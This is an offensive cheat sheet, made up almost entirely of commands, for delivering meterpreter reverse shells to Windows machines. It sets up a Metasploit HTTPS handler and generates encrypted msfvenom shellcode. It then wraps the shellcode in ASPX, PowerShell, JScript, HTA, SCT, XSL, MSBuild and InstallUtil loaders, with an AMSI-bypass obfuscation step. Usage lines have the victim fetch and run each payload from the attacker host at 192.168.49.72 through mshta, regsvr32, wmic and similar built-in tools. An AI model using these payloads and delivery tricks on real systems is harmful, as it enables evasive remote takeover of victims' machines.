## Start listeners

HTTP web server
```
lets listen/serve/http
```

HTTPS meterpreter handler
```
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_https
set LHOST 192.168.49.72
set LPORT 443
set ExitOnSession false
set HandlerSSLCert /tmp/server.pem
set EnableStageEncoding true
run -j
```

## Basic payloads

Shellcode
```
lets generate/payload/msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_https LHOST=192.168.49.72 LPORT=443 -f raw -vo payload.bin
lets encrypt/rc4 < payload.bin > payload.bin.encrypted
echo "[KEY]" | base64 -d > payload.bin.encrypted.key
```

ASPX
```
lets format/windows/assembly/csharp_aspx < loader64.dll -c Loader -m DecryptAndMigrate -a $(base64 -w0 payload.bin.encrypted) -a $(base64 -w0 payload.bin.encrypted.key) -a notepad.exe -v | lets format/csharp/aspx -vo payload.aspx
```

PowerShell AMSI Disabler
```
echo "'amsiutils'" | lets encode/powershell/bypass/dynamic -v | lets encode/powershell/obfuscate -vo amsi.ps1
```

PowerShell
```
lets format/windows/x64/pic/powershell < payload.bin -v | lets encode/powershell/bypass/dynamic -v | lets encode/powershell/obfuscate -v | lets encode/powershell/compress -vo payload.ps1
```

JScript
```
lets format/windows/assembly/jscript --version auto < loader64.dll -c Loader -m DecryptAndMigrate -a $(base64 -w0 payload.bin.encrypted) -a $(base64 -w0 payload.bin.encrypted.key) -a notepad.exe -vo payload.jscript
```

HTA
```
lets format/jscript/hta < payload.jscript -vo payload.hta
# Usage: mshta.exe http://192.168.49.72/payload.hta
```

SCT
```
lets format/jscript/sct < payload.jscript -vo payload.sct
# Usage: mshta.exe javascript:a=GetObject("script:http://192.168.49.72/payload.sct").Exec();close();
```

SCT-REGSVR
```
lets format/jscript/sct_regsvr32 < payload.jscript -vo payload_regsvr32.sct
# Usage: regsvr32 /u /n /s /i:http://192.168.49.72/payload_regsvr32.sct scrobj.dll
```

XSL
```
lets format/jscript/xsl < payload.jscript -vo payload.xsl
# Usage: wmic process get brief /format:"http://192.168.49.72/payload.xsl"
```

MSBUILD
```
lets format/windows/assembly/msbuild < loader64.dll -c Loader -m DecryptAndMigrate -a $(base64 -w0 payload.bin.encrypted) -a $(base64 -w0 payload.bin.encrypted.key) -a notepad.exe -vo payload.msbuild
# Usage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe run.csproj
```

INSTALLUTIL
```
lets format/windows/assembly/csharp_installutil < loader64.dll -c Loader -m DecryptAndMigrate -a $(base64 -w0 payload.bin.encrypted) -a $(base64 -w0 payload.bin.encrypted.key) -a notepad.exe -vo payload_installutil.cs
# Paste payload_installutil.cs into an assembly and add the 'System.Configuration.Install' reference
# Usage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U run.exe
```
